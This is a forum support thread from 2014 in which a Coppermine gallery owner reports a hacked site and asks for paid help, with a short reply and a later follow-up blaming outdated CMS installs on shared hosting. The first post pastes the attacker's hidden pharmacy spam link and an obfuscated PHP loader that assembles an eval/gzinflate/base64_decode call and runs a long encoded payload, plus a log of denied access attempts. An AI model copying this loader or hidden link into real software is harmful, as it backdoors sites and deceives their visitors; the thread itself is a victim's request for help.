forum.coppermine-gallery.net

Support => Looking for Freelancers / Paid help => Topic started by: statek on February 24, 2014, 12:28:41 pm

Title: Coppermine gallery was hacked with hidden link in footer. Need help!
Post by: statek on February 24, 2014, 12:28:41 pm
Hello CPG community.

My CPG gallery 1.4.27 (kosivart.net) was hacked and I need advice or help:

1. appeared hidden link in footer on every page like:
Code: [Select]
<font style='position: absolute;overflow: hidden;height: 0;width: 0'><a href="on line ph a r m ac y. c o m">on line ph a r m ac y</a></font>
2. every php file was edited with code on top like:

Code: [Select]
<?php
$md5 
"d7d802e57d69950fc02f71341bd1efc1";
$a6 = array("$",";","t",'g',"_",'z','b',"d",')',"o","a","s",'v','6','e',"c",'r','4',"(",'i','f','l',"n");
$b67 create_function('$'.'v',$a6[14].$a6[12].$a6[10].$a6[21].$a6[18].$a6[3].$a6[5].$a6[19].$a6[22].$a6[20].$a6[21].$a6[10].$a6[2].$a6[14].$a6[18].$a6[6].
$a6[10].$a6[11].$a6[14].$a6[13].$a6[17].$a6[4].$a6[7].$a6[14].$a6[15].$a6[9].$a6[7].$a6[14].$a6[18].$a6[0].$a6[12].$a6[8].$a6[8].$a6[8].$a6[1]);
$b67('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'
);
?>

3. here is security log:
Code: [Select]
    <?php
    
/*************************
    Coppermine Photo Gallery
    ************************
    Copyright (c) 2003-2014 Coppermine Dev Team
    v1.0 originally written by Gregory Demar

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License version 3
    as published by the Free Software Foundation.

    ********************************************
    Coppermine version: 1.5.26
    $HeadURL: https://svn.code.sf.net/p/coppermine/code/trunk/cpg1.5.x/logs/log_header.inc.php $
    $Revision: 8638 $
    **********************************************/

    
if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

    
?>
2014-02-23 18:14:12 - Denied privileged access to functions.inc.php by user Guest at IP 5.10.83.48
    2014-02-23 18:14:12 - Invalid form token encountered for functions.inc.php by user Guest at IP 5.10.83.48
    2014-02-23 18:15:48 - Denied privileged access to functions.inc.php by user Guest at IP 157.56.93.51
    2014-02-23 18:15:48 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.56.93.51
    2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
    2014-02-23 18:18:03 - Denied privileged access to functions.inc.php by user Guest at IP 195.162.81.150
    2014-02-23 18:18:03 - Invalid form token encountered for functions.inc.php by user Guest at IP 195.162.81.150
    2014-02-23 18:18:51 - Denied privileged access to functions.inc.php by user Guest at IP 5.10.83.84
    2014-02-23 18:18:51 - Invalid form token encountered for functions.inc.php by user Guest at IP 5.10.83.84
    2014-02-23 18:20:15 - Denied privileged access to functions.inc.php by user Guest at IP 46.200.97.26
    2014-02-23 18:20:15 - Invalid form token encountered for functions.inc.php by user Guest at IP 46.200.97.26
    2014-02-23 18:20:54 - Denied privileged access to functions.inc.php by user Guest at IP 157.56.93.74
    2014-02-23 18:20:54 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.56.93.74
    2014-02-23 18:20:54 - Denied privileged access to functions.inc.php by user Guest at IP 157.56.93.74
    2014-02-23 18:20:54 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.56.93.74
    2014-02-23 18:21:32 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.32.226
    2014-02-23 18:21:32 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.32.226
    2014-02-23 18:26:30 - Denied privileged access to functions.inc.php by user Guest at IP 5.10.83.84
    2014-02-23 18:26:30 - Invalid form token encountered for functions.inc.php by user Guest at IP 5.10.83.84
    Лют 23, 2014 - 18:27 - Denied privileged access to versioncheck.php by user Guest at IP 46.200.97.26
    Лют 23, 2014 - 18:28 - Denied privileged access to admin.php by user Guest at IP 46.200.97.26
    Лют 23, 2014 - 18:53 - Denied privileged access to register.php by user Guest at IP 188.240.143.217
    Лют 23, 2014 - 19:11 - Denied privileged access to register.php by user Guest at IP 192.95.43.213
    Лют 23, 2014 - 19:17 - Denied privileged access to register.php by user Guest at IP 173.232.107.157
    Лют 23, 2014 - 19:53 - Denied privileged access to register.php by user Guest at IP 23.88.104.142
    Лют 23, 2014 - 21:28 - Denied privileged access to register.php by user Guest at IP 192.95.0.202
    Лют 23, 2014 - 23:33 - Denied privileged access to register.php by user Guest at IP 192.3.182.139
    Лют 24, 2014 - 00:30 - Denied privileged access to register.php by user Guest at IP 184.154.187.86
    Лют 24, 2014 - 03:16 - Denied privileged access to register.php by user Guest at IP 199.200.120.136
    Лют 24, 2014 - 03:19 - Denied privileged access to register.php by user Guest at IP 216.152.251.87
    Лют 24, 2014 - 04:12 - Denied privileged access to register.php by user Guest at IP 89.47.17.127
    Лют 24, 2014 - 04:56 - Denied privileged access to register.php by user Guest at IP 62.113.243.249
    Лют 24, 2014 - 06:09 - Denied privileged access to register.php by user Guest at IP 78.47.154.199
    Лют 24, 2014 - 07:05 - Denied privileged access to register.php by user Guest at IP 81.65.64.16
    Лют 24, 2014 - 07:35 - Denied privileged access to register.php by user Guest at IP 216.152.251.87
    Feb 24, 2014 at 07:35 AM - Denied privileged access to register.php by user Guest at IP 216.152.251.87
    Лют 24, 2014 - 07:38 - Denied privileged access to register.php by user Guest at IP 107.161.85.157
    Лют 24, 2014 - 08:01 - Denied privileged access to register.php by user Guest at IP 5.153.235.31
    Лют 24, 2014 - 08:27 - Denied privileged access to register.php by user Guest at IP 151.236.15.145
    Feb 24, 2014 at 08:27 AM - Denied privileged access to register.php by user Guest at IP 151.236.15.145
    Лют 24, 2014 - 09:07 - Denied privileged access to register.php by user Guest at IP 94.23.150.152
    Лют 24, 2014 - 10:40 - Denied privileged access to register.php by user Guest at IP 199.119.225.102
    Feb 24, 2014 at 10:40 AM - Denied privileged access to register.php by user Guest at IP 199.119.225.102
    Лют 24, 2014 - 10:44 - Denied privileged access to admin.php by user Guest at IP 46.200.106.202
    Лют 24, 2014 - 11:06 - Denied privileged access to register.php by user Guest at IP 81.65.64.16
    Лют 24, 2014 - 11:44 - Invalid form token encountered for admin.php by user diamond at IP 46.200.106.202
    Лют 24, 2014 - 11:47 - Invalid form token encountered for admin.php by user diamond at IP 46.200.106.202
    Лют 24, 2014 - 12:01 - Denied privileged access to viewlog.php by user Guest at IP 66.249.73.162

So I already upgraded to latest 1.5.26 version and changed admin password. But that didn't helped :( Today I saw hidden link again and all php files was edited with php md5 code again.
Currently I replaced all files from fresh install but I think link will return back tomorrow :(

One more notes:
1. I use Godaddy shared linux hosting
2. I also have wordpress sites on my account and they were hacked too with (one example: kosivrada.if.ua)! hidden link in footer. Upgrading WP and plugins to latest version removes link but next day it returns back!

Please, community, somebody help me with this because hacker can ruin yours site too!

How can I secure my gallery from this spammer?

May be some qualified team developer can handle this issue. I can give ftp and db access and I'm ready to pay for that work.
Title: Re: Coppermine gallery was hacked with hidden link in footer. Need help!
Post by: phill104 on February 24, 2014, 12:47:54 pm
I've sent you an email.
Title: Re: Coppermine gallery was hacked with hidden link in footer. Need help!
Post by: statek on March 06, 2014, 06:57:11 pm
I want to thank Phill for support in this issue!

Problem is actually not in CPG but shared hosting account on which I also host sites on Wordpress and Joomla. Some sites had outdated CMS versions so no wonder my account was hacked.

So, everyone, check your sites for hidden pharma links and anyway update your sites to latest versions to avoid future problems and waste of time.
Title: Re: Coppermine gallery was hacked with hidden link in footer. Need help!
Post by: statek on March 06, 2014, 07:41:50 pm
Helpful links in case your site been hacked: